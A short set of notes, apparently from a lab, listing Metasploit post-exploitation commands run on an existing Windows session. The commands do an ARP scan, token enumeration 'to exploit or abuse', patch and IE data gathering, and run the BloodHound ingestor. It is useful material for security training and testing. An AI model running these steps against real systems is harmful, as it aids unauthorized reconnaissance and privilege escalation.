#get mac and ip
use post/windows/gather/arp_scanner
options
set rhost 192.168.56.10 192.168.56.22
run
#get the available tokens that we can exploit or abuse
use post/windows/gather/enum_tokens
set session 2
run
#get the patch history of the server
use post/windows/gather/enum_patches
options
set session 2
run
#retrieves IE information
use post/windows/gather/enum_ie
options
set session 2
run
#executes the bloodhound data ingestor
use post/windows/gather/bloodhound
options
set session 2
run
#search for more windows modules
search post/windows/gather
search post/windows/
search post/windows/recon